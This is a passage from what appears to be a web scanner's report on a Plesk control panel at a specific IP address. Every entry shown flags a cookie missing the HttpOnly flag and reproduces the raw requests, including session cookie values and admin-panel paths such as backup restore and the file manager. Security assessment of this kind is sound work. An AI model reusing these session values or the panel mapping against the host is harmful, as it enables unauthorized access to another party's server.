Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:26 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.93. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x5a764c4aa919d45916a21adb9cd4bc2a/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:41 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:42 GMT
Connection: close
Content-Length: 19780

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.94. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x84f3b2f887bd00dae55702ae30c9ac7c/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:54 GMT
Connection: close
Content-Length: 13756

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.95. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/item@0x926b8ec323bf6361f0a0a01ecfc62f15/restore/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:06:46 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:06:47 GMT
Connection: close
Content-Length: 19804

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.96. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/upload/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/local-repository/upload/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/local-repository/upload/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:02:22 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:02:21 GMT
Content-Length: 15554

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.97. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/schedule/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/schedule/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/schedule/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: PLESKSESSID=5aba84c83ce13800011e486e62d0fb88; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 21:01:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 21:01:33 GMT
Content-Length: 21387

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.98. https://50.22.21.242:8443/plesk/client@1/domain@1/backup/task@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/backup/task@/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/backup/task@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@1/domain@1/backup/local-repository/
Cookie: locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; PLESKSESSID=5aba84c83ce13800011e486e62d0fb88

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:58:30 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:58:30 GMT
Connection: close
Content-Length: 20734

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.99. https://50.22.21.242:8443/plesk/client@1/domain@1/dns/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/dns/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/dns/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=39139572be0e1777a54c9a9ae93f2e91; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 20:35:56 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 20:36:00 GMT
Content-Length: 0


5.100. https://50.22.21.242:8443/plesk/client@1/domain@1/traffic-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/domain@1/traffic-hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/domain@1/traffic-hosting HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/statistics
Cookie: certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:15:07 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:15:07 GMT
Content-Length: 20261

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.101. https://50.22.21.242:8443/plesk/client@1/shared-ssl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@1/shared-ssl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@1/shared-ssl/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/web/view
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl; psaContext=tools

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 02:04:20 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 02:04:20 GMT
Content-Length: 15652

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.102. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:49 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:49 GMT
Connection: close
Content-Length: 18729

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.103. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:48 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:48 GMT
Connection: close
Content-Length: 60502

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.104. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/create-dir/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/create-dir/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:15:39 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:15:39 GMT
Connection: close
Content-Length: 48907

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.105. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=chdir&file=%2F HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:30:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:30:00 GMT
Connection: close
Content-Length: 60069

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

5.106. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/permissions/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/permissions/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
